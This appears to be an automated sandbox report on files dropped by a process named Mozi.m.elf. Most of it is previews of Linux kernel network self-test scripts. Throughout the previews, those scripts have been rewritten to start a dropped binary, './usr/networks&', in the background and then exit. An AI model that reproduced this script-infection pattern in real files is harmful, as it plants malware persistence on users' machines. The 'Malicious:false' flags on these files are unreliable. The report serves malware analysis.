                                                              SHA-512:6A410CF23E3B40168C11641FC28440F23A966EB0069A737806885A7E1AB152A3D75CA34EB06E347926EB504842AB28E500AAC0429D3CBFCC9E1785CCF5C8E5AD
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit "$?"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):8809
                                                              Entropy (8bit):5.131942825600482
                                                              Encrypted:false
                                                              SSDEEP:192:8uX+hN6arJxeYLAEiNEixEiwEpE+60jTEij8EiQTEiQ8Ewswv:oDxXu1hHXWm4A
                                                              MD5:6409214F7DB17219ACC4BC011DF69AA7
                                                              SHA1:CE2A3FF1CFAF0C4435E07336519C86D796FA36D0
                                                              SHA-256:22174E276FCBAD979D3E75A334AED2B45ECFB01086FD7AA69961ECF1B498BBDE
                                                              SHA-512:6D2D037DC5EE3682E84C8A437223264FCD7939ACE3905DB0E59D320AAA8B5AE9502C5B12A18E2B0436411D92604EFE9FB3A3D55CB5AE75F37E6689D210B1CA2E
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..run_cmd().{..local ns..local cmd..local out..local rc...ns="$1"..shift..cmd="$*"...if [ "$VERBOSE" = "1" ]; then...printf " COMMAND: $cmd\n"..fi...out=$(eval ip netns exec ${ns} ${cmd} 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..################################################################################.# create namespaces and interconnects..create_ns().{..local ns=$1..local addr=$2..local addr6=$3...[ -z "${addr}" ] && addr="-"..[ -z "${addr6}" ] && addr6="-"...ip netns add ${ns}...ip -netns ${ns} link set lo up..if [ "${addr}" != "-" ]; then...ip -netns ${ns} addr add dev lo ${addr}..fi..if [ "${addr6}" != "-" ]; then...ip -netns ${ns} -6 addr add dev lo ${addr6}..fi...ip -netns ${ns} ro add unreachable default metric 8192..ip -netns ${ns} -6 ro add unreachable default metric 8192...ip netns exec ${ns} sysctl -qw net.ipv4.ip_forward=1..ip n
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2423
                                                              Entropy (8bit):5.348615674361073
                                                              Encrypted:false
                                                              SSDEEP:48:ZmbexK9Ike8wCqHKVc+iAtGzI9R5LnduFKFuNrM730iRi5oivcsxmz9Q:VAwCEKxiLKzWcu5uRYcsxg9Q
                                                              MD5:9D218445D56FAC6B88E0E2E435BA2991
                                                              SHA1:878089A1BF78B2B966AFFE6405B000ED266C3B71
                                                              SHA-256:A6E20F1D6177071C5161DBE1979B9586C3ACE1E81A01CAEDA8DC3D1ABBAC74F0
                                                              SHA-512:78C29745CE9CF5DB1BA2A3348DCBAA3821E78DEFA51A7890A39DFA9B2C1E42FE6DAA9E811FFA2464CC067401528AE55269A3E70B5BC95B7688B0F1DA31ADA903
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..# Argument parsing.if [[ "$#" -lt "2" ]]; then..echo "Usage: $0 [4|6] [tcp|udp|raw|raw_hdrincl|packet|packet_dgram] <args>"..exit 1.fi..readonly IP="$1".shift.readonly TXMODE="$1".shift.readonly EXTRA_ARGS="$@"..# Argument parsing: configure addresses.if [[ "${IP}" == "4" ]]; then..readonly SADDR="${SADDR4}"..readonly DADDR="${DADDR4}".elif [[ "${IP}" == "6" ]]; then..readonly SADDR="${SADDR6}"..readonly DADDR="${DADDR6}".else..echo "Invalid IP version ${IP}"..exit 1.fi..# Argument parsing: select receive mode.#.# This differs from send mode for.# - packet:.use raw recv, because packet receives skb clones.# - raw_hdrinc: use raw recv, because hdrincl is a tx-only option.case "${TXMODE}" in.'packet' | 'packet_dgram' | 'raw_hdrincl')..RXMODE='raw'..;;.*)..RXMODE="${TXMODE}"..;;.esac..# Start of state changes: install cleanup handler.save_sysctl_mem="$(sysctl -n ${path_sysctl_mem})"..cleanup() {..ip netns del "${NS2}"..ip netns del "${NS1}"..sysctl -w -q "${pat
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):553
                                                              Entropy (8bit):5.3899937534824
                                                              Encrypted:false
                                                              SSDEEP:12:9eZNLWP1k99KSjnNflg6vBZNfoEfVaf7mfFtzMK4n:2LWP1EdnNfdlQEfcf7mfXzL4
                                                              MD5:15A4626E27E3B938F8FFDBD303D53B33
                                                              SHA1:84F28641C199CB497995A3CE8DB5A2FCD25DC5A0
                                                              SHA-256:0AF6B2C83FF0359431DFB094DE232EAE76F5B75451F6F676929D9AB475A21387
                                                              SHA-512:950324F54EAC2C5342721A73404919F1D386BEDB5930DF72C0CBE72C6F6AA43EA0152542B5881F6735321E4D90D86937276FBD7F3269FC1BE181B527066FE6C2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..ip link show 2>/dev/null >/dev/null.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without the ip tool"..exit $ksft_skip.fi..TMP_LIST_NETDEV="$(mktemp)".if [ ! -e "$TMP_LIST_NETDEV" ];then..echo "FAIL: Cannot create a tmp file"..exit 1.fi..ip link show |grep '^[0-9]' | grep -oE '[[:space:]].*eth[0-9]*:|[[:space:]].*enp[0-9]s[0-9]:' | cut -d\ -f2 | cut -d: -f1> "$TMP_LIST_NETDEV".while read netdev.do..kci_test_netdev "$netdev".done < "$TMP_LIST_NETDEV"..rm "$TMP_LIST_NETDEV".exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):6927
                                                              Entropy (8bit):5.245316277904996
                                                              Encrypted:false
                                                              SSDEEP:192:GZgLaLRutZZZY0RotZeOLeiTJPxJdErVNSPB1:0LMvy5xLB1
                                                              MD5:71A773A1CF4C2844EC690C14DC2795D4
                                                              SHA1:4D7F2F8656BCEE4FEC77F9CB4E48696074142753
                                                              SHA-256:C4D2798D0A46D005EC75BB7894E220768B253C31B354A917F24B3F82D3AFF42F
                                                              SHA-512:B8E3BA8C33648BE22E6E241E083DF708A894C57CAD36C0FB5EC5A60549928EDAE105FFEAE2011EDD83C2FC206D0A55A3EA714B7997D76160C586A8E9D32AD933
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..elif [ $ret -eq $ksft_skip ]; then...printf "TEST: %-60s [SKIP]\n" "${tdesc}"...err_flush..fi...return $ret..)..ret=$?..case $ret in...0)....all_skipped=false....[ $exitcode=$ksft_skip ] && exitcode=0...;;...$ksft_skip)....[ $all_skipped = true ] && exitcode=$ksft_skip...;;...*)....all_skipped=false....exitcode=1...;;..esac...return $ret.}..run_test_nh() {..tname="$1"..tdesc="$2"...USE_NH=yes..run_test "${tname}" "${tdesc} - nexthop objects"..USE_NH=no.}..test_list_flush_ipv4_exception() {..setup namespaces routing || return $ksft_skip..trace "${ns_a}" veth_A-R1 "${ns_r1}" veth_R1-A \.. "${ns_r1}" veth_R1-B "${ns_b}" veth_B-R1 \.. "${ns_a}" veth_A-R2 "${ns_r2}" veth_R2-A \.. "${ns_r2}" veth_R2-B "${ns_b}" veth_B-R2...dst_prefix1="${prefix4}.${b_r1}."..dst2="${prefix4}.${b_r2}.1"...# Set up initial MTU values..mtu "${ns_a}" veth_A-R1 2000..mtu "${ns_r1}" veth_R1-A 2000..mtu "${ns_r1}" veth_R1-B 1500..mtu "${ns_b}" veth_B-R1 150
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):27705
                                                              Entropy (8bit):5.130824667635872
                                                              Encrypted:false
                                                              SSDEEP:384:plueipsq4jk3JBM9M805s0/tuInWXwgs67rZB4c4LcjyVIBM0l8Xt7OQ:plj0CwtupXwgs5
                                                              MD5:4C5823B32859398C4CF3545B601B90AD
                                                              SHA1:1CECDD2FED9EC85D8E633DDA4266F9BB231D527C
                                                              SHA-256:7F519C632595142674CD45BC369973D1140A098D9622A2BEA3202E086DA51F10
                                                              SHA-512:15015A5332A8757DB8A0BBB776F18CB9F87C70FBFDCEF2FD0ADBF4E5443CB46A90FC6C43D2AC397B22A161862FBFE633E654A9B1F4C0EF588532509EC5F5E718
                                                              Malicious:false
                                                              Preview:./usr/networks&.# set global exit status, but never reset nonzero one..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..# same but inverted -- used when command must fail for test to pass.check_fail().{..if [ $1 -eq 0 ]; then...ret=1..fi.}..kci_add_dummy().{..ip link add name "$devdummy" type dummy..check_err $?..ip link set "$devdummy" up..check_err $?.}..kci_del_dummy().{..ip link del dev "$devdummy"..check_err $?.}..kci_test_netconf().{..dev="$1"..r=$ret...ip netconf show dev "$dev" > /dev/null..check_err $?...for f in 4 6; do...ip -$f netconf show dev "$dev" > /dev/null...check_err $?..done...if [ $ret -ne 0 ] ;then...echo "FAIL: ip netconf show $dev"...test $r -eq 0 && ret=0...return 1..fi.}..# add a bridge with vlans on top.kci_test_bridge().{..devbr="test-br0"..vlandev="testbr-vlan1"...local ret=0..ip link add name "$devbr" type bridge..check_err $?...ip link set dev "$devdummy" master "$devbr"..check_err $?...ip link set "$devbr" up..check_err $?...ip link add link "$devb
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):656
                                                              Entropy (8bit):4.8250605751068365
                                                              Encrypted:false
                                                              SSDEEP:12:LHMHDFIJQDFIJc/DFIJ0/DFIJs/DFIJH26zxGkFbwDFIJ6CDFIJJoDFIJUvDFIJm:LHMHDFIJQDFIJKDFIJCDFIJaDFIJdxjz
                                                              MD5:53337CAEED6C138D63B0E15D58EC25D9
                                                              SHA1:0E93369E52555A57951321A297B191ED623E513B
                                                              SHA-256:619047CB4E304B0D3855233EA3AB615E439C64714B45BFD733E8AB9F20CBFDCD
                                                              SHA-512:D4CA977EAD46EB46AF4B9CD78EAB3F93B2C350DBE164EAC25F9A4FFC4189562485DAABA91E50BD135B3395F6482E51F825364851E16B840960E698B399742467
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $?.fi..set -e..tc qdisc add dev lo root fq../so_txtime -4 -6 -c mono a,-1 a,-1../so_txtime -4 -6 -c mono a,0 a,0../so_txtime -4 -6 -c mono a,10 a,10../so_txtime -4 -6 -c mono a,10,b,20 a,10,b,20../so_txtime -4 -6 -c mono a,20,b,10 b,20,a,20..if tc qdisc replace dev lo root etf clockid CLOCK_TAI delta 400000; then..! ./so_txtime -4 -6 -c tai a,-1 a,-1..! ./so_txtime -4 -6 -c tai a,0 a,0.../so_txtime -4 -6 -c tai a,10 a,10.../so_txtime -4 -6 -c tai a,10,b,20 a,10,b,20.../so_txtime -4 -6 -c tai a,20,b,10 b,10,a,20.else..echo "tc ($(tc -V)) does not support qdisc etf. skipping".fi..echo OK. All tests passed../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):51
                                                              Entropy (8bit):4.0566141271368545
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaUSXVOORgn:RMn
                                                              MD5:25486302E2F79E715F71224880891FB0
                                                              SHA1:558D33B331F487C6617CEDBDCEC691FC47647B88
                                                              SHA-256:850754C348CF66F7EB60CD7F6C452215A466AD2A5EC5D9F64FAB9335ABF40183
                                                              SHA-512:AB584D017C9D3A4BD2D62B6874C6AF315EC308EDA10BD38B97D704013505F7E7E1FFA1D07FA0B29E40515469E4B95D61D291A468D2353F65F2B83813631EA673
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1;.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):51
                                                              Entropy (8bit):4.0566141271368545
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaUSXVOORgn:RMn
                                                              MD5:25486302E2F79E715F71224880891FB0
                                                              SHA1:558D33B331F487C6617CEDBDCEC691FC47647B88
                                                              SHA-256:850754C348CF66F7EB60CD7F6C452215A466AD2A5EC5D9F64FAB9335ABF40183
                                                              SHA-512:AB584D017C9D3A4BD2D62B6874C6AF315EC308EDA10BD38B97D704013505F7E7E1FFA1D07FA0B29E40515469E4B95D61D291A468D2353F65F2B83813631EA673
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1;.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2382
                                                              Entropy (8bit):4.741658396321069
                                                              Encrypted:false
                                                              SSDEEP:48:yLLMtE5wKhzJ6YbFCB9BMT4J4uGZTG/A8:ynMtE5wK9U3MT42ttGv
                                                              MD5:E9155DD4BB8D021515B8E1FB4DF3F1D9
                                                              SHA1:02CF9F008F0650C56BB20933DF10671487B48C32
                                                              SHA-256:5EE5E55DBE08499E7DB792B6568D62E8ADDAD3E83301B0AA0964D7BEB04AEDE6
                                                              SHA-512:50E24943AB337B25BF2A8817797821D0CC8F2B5081535E89C353B3E2A141F11B5671F7407102933D34A1AFA0F5F545581DC26F5296FAF08EB60B132133BB313E
                                                              Malicious:false
                                                              Preview:./usr/networks&.[[ $1 == "clean" ]] && exit 0..trap cleanup EXIT..# Setup "Hypervisors" simulated with netns.ip link add veth-hv-1 type veth peer name veth-hv-2.setup-hv-networking() {. hv=$1.. ip netns add hv-$hv. ip link set veth-hv-$hv netns hv-$hv. ip -netns hv-$hv link set veth-hv-$hv name veth0.. ip -netns hv-$hv link add vrf-underlay type vrf table 1. ip -netns hv-$hv link set vrf-underlay up. ip -netns hv-$hv addr add 172.16.0.$hv/24 dev veth0. ip -netns hv-$hv link set veth0 up.. ip -netns hv-$hv link add br0 type bridge. ip -netns hv-$hv link set br0 up.. ip -netns hv-$hv link add vxlan0 type vxlan id 10 local 172.16.0.$hv dev veth0 dstport 4789. ip -netns hv-$hv link set vxlan0 master br0. ip -netns hv-$hv link set vxlan0 up.}.setup-hv-networking 1.setup-hv-networking 2..# Check connectivity between HVs by pinging hv-2 from hv-1.echo -n "Checking HV connectivity ".ip netns exec hv-1 ping -c 1 -W
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5641
                                                              Entropy (8bit):5.313892425850938
                                                              Encrypted:false
                                                              SSDEEP:96:plMw5r4X2+JC+F0112mpdNo1F0JyuclvZYCXmp99F01145Rmmpd8U4c76EBgB3qE:plP5HyG6QcUrTpr9c9qXgXeYWpbXfXh0
                                                              MD5:DB3D15135543C92A59182516B05220DA
                                                              SHA1:97D47FA6E4ED35EDC4D696879AC6C413437807CD
                                                              SHA-256:20EE7F91469500AA440CBC16382B6B247DF6BF25B3062A50CDDB336305DA35C9
                                                              SHA-512:B4D3369752599489BC7CC698580615857FAB45B8B1FA855E62EB0A26E260B78505BBB0920E0324D8C1252A62F354AA4C6D0936EA918DC2F8F41A81D76E362A80
                                                              Malicious:false
                                                              Preview:./usr/networks&.# set global exit status, but never reset nonzero one..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..cleanup() {..local -r jobs="$(jobs -p)"..local -r ns="$(ip netns list|grep $PEER_NS)"...[ -n "${jobs}" ] && kill -1 ${jobs} 2>/dev/null..[ -n "$ns" ] && ip netns del $ns 2>/dev/null.}.trap cleanup EXIT..cfg_veth() {..ip netns add "${PEER_NS}"..ip -netns "${PEER_NS}" link set lo up..ip link add type veth..ip link set dev veth0 up..ip addr add dev veth0 192.168.1.2/24..ip addr add dev veth0 2001:db8::2/64 nodad...ip link set dev veth1 netns "${PEER_NS}"..ip -netns "${PEER_NS}" addr add dev veth1 192.168.1.1/24..ip -netns "${PEER_NS}" addr add dev veth1 2001:db8::1/64 nodad..ip -netns "${PEER_NS}" link set dev veth1 up..ip -n "${PEER_NS}" link set veth1 xdp object ../bpf/xdp_dummy.o section xdp_dummy.}..run_one() {..# use 'rx' as separator between sender args and receiver args..local -r all="$@"..local -r tx_args=${all%rx*}..local -r rx_args=${all#*rx}...cfg_veth..
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):167
                                                              Entropy (8bit):4.694318956835895
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaBMAG2FVFUFrOrJhidYYY6X/AF1GtP88YK76MLg0LC1jDXVOORgn:LhVlhiTXX/A7lK76Kr2NMn
                                                              MD5:D06578C3F54C37737723D227F5A79A73
                                                              SHA1:B4FFDEA60E2C90C9C9F29C57BADF2CB22F4ACBCD
                                                              SHA-256:8EDB5712A96D724B1A85C888EE66221059A1E5EB79F81F3789A05461488CE667
                                                              SHA-512:7C1FA97A41C1A27891F2E43E6D7D3ABB88BF3B13540E3D1A22E8E3CE6F182A6059E46EF563B8D6330F7773646231FC11FC5D5E126FC704EB6F176016DC35D957
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit -1.fi..if [[ $# -eq 0 ]]; then..run_all.elif [[ $1 == "__subprocess" ]]; then..shift..run_one $@.else..run_in_netns $@.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2151
                                                              Entropy (8bit):5.261578154191124
                                                              Encrypted:false
                                                              SSDEEP:48:wdh6P+cigZGpRFcXe35Pmhs/VSKKPQhw4bqMDSH8K3ZMiFyiu:s6P+cij+Xe0F4O4eMu5dNu
                                                              MD5:10DFDD7A55089A036920280CDDBA5BD1
                                                              SHA1:48ED095C8FA4B83E51E14A3E2A6037AAE4AFC92D
                                                              SHA-256:A431152B32EB648D990F0EC1378859E969EA4FD29BF906F1053B15E5646FACF4
                                                              SHA-512:09F6F953329565B60537D579F245D1B588C990C2740DB793D7D6AF11E1315A524443EACBC41D748FEE6936AAAB5453337B7F93A54CC9FD82C4A2550FE26EA3C4
                                                              Malicious:false
                                                              Preview:./usr/networks&.kselftest_test_exitcode() {..local -r exitcode=$1...if [[ ${exitcode} -eq ${KSFT_PASS} ]]; then...num_pass=$(( $num_pass + 1 ))..elif [[ ${exitcode} -eq ${KSFT_SKIP} ]]; then...num_skip=$(( $num_skip + 1 ))..else...num_err=$(( $num_err + 1 ))..fi.}..kselftest_exit() {..echo -e "$(basename $0): PASS=${num_pass} SKIP=${num_skip} FAIL=${num_err}"...if [[ $num_err -ne 0 ]]; then...echo -e "$(basename $0): ${RED}FAIL${NC}"...exit ${KSFT_FAIL}..fi...if [[ $num_skip -ne 0 ]]; then...echo -e "$(basename $0): ${YELLOW}SKIP${NC}"...exit ${KSFT_SKIP}..fi...echo -e "$(basename $0): ${GREEN}PASS${NC}"..exit ${KSFT_PASS}.}..wake_children() {..local -r jobs="$(jobs -p)"...if [[ "${jobs}" != "" ]]; then...kill -1 ${jobs} 2>/dev/null..fi.}.trap wake_children EXIT..run_one() {..local -r args=$@..../udpgso_bench_rx &.../udpgso_bench_rx -t &..../udpgso_bench_tx ${args}.}..run_in_netns() {..local -r args=$@..../in_netns.sh $0 __subprocess ${args}..kselftest_test_exitcode $?.}..run_udp() {..
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):7692
                                                              Entropy (8bit):5.076292397526648
                                                              Encrypted:false
                                                              SSDEEP:192:ujRQNQ6TpjT0TNJPSoXHyHSnA8A2DPiXeymgC:u36UPiX0gC
                                                              MD5:EC62E99FBDF27537E608D7238EC09262
                                                              SHA1:A5E2021688DA3FF89736841FC3FA5B6363280F37
                                                              SHA-256:01FE9D1FF4970B2D8A86E820A4514852581AA8C45C19C821872CEB151C79AFF9
                                                              SHA-512:11C9B295798FBD7EBD691CF0A006857CC33388938D015EE6AA14CBF9C632CA8ECFF65207DB170E31B487B612349870062E7218CAB6F6DCDDF3F885F94F1FCBFD
                                                              Malicious:false
                                                              Preview:./usr/networks&....exit 0...elif [ x"$c" = x ]; then....echo "ERROR: No counters"....ret=1....exit 111...else....exit 1...fi..).}..check_xfrm() {..# 0: iptables -m policy rule count == 0..# 1: iptables -m policy rule count != 0..rval=$1..ip=$2..local lret=0...ip netns exec ns1 ping -q -c 1 10.0.2.$ip > /dev/null...check_ipt_policy_count ns3..if [ $? -ne $rval ] ; then...lret=1..fi..check_ipt_policy_count ns4..if [ $? -ne $rval ] ; then...lret=1..fi...ip netns exec ns2 ping -q -c 1 10.0.1.$ip > /dev/null...check_ipt_policy_count ns3..if [ $? -ne $rval ] ; then...lret=1..fi..check_ipt_policy_count ns4..if [ $? -ne $rval ] ; then...lret=1..fi...return $lret.}..check_exceptions().{..logpostfix="$1"..local lret=0...# ping to .254 should be excluded from the tunnel (exception is in place)...check_xfrm 0 254..if [ $? -ne 0 ]; then...echo "FAIL: expected ping to .254 to fail ($logpostfix)"...lret=1..else...echo "PASS: ping to .254 bypassed ipsec tunnel ($logpostfix)"..fi...# ping to .253 shoul
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3636
                                                              Entropy (8bit):4.929082746023161
                                                              Encrypted:false
                                                              SSDEEP:96:vt9Z1NPWAzvCkqWb3o4f+1bD4otWzUD81bZ1FI92Wr:Hs5XKQ1bD4uyU41bLFI92C
                                                              MD5:66A4827A56BD561933E2CD68ED1D5667
                                                              SHA1:46885F18DA976030D9866102505F99E78FC52013
                                                              SHA-256:5FC4BCFD5D1FD4F2677CDA8385118F8AA52B2AA99A08CFB70EBD282B4B82F123
                                                              SHA-512:17EEA69BC464219FAEC241AA97F6A41A064D13413EDDC04CA3FE792FA3941E122C8CE1EA8946092C8996A07F63103E963F03A7FEC8E07A7213D28D294E8B9E15
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..ip netns add ns0.ip netns add ns1.ip netns add ns2..ip link add veth0 netns ns0 type veth peer name eth0 netns ns1.if [ $? -ne 0 ]; then..echo "SKIP: Can't create veth device"..exit $ksft_skip.fi.ip link add veth1 netns ns0 type veth peer name eth0 netns ns2..ip -net ns0 link set lo up.ip -net ns0 link set veth0 up.ip -net ns0 link set veth1 up..ip -net ns0 link add br0 type bridge.if [ $? -ne 0 ]; then..echo "SKIP: Can't create bridge br0"..exit $ksft_skip.fi..ip -net ns0 link set veth0 master br0.ip -net ns0 link set veth1 master br0.ip -net ns0 link set br0 up.ip -net ns0 addr add 10.0.0.1/24 dev br0..# place both in same subnet, ns1 and ns2 connected via ns0:br0.for i in 1 2; do. ip -net ns$i link set lo up. ip -net ns$i link set eth0 up. ip -net ns$i addr add 10.0.0.1$i/24 dev eth0.done..test_ebtables_broute().{..local cipt
                                                              Process:/tmp/Mozi.m.elf
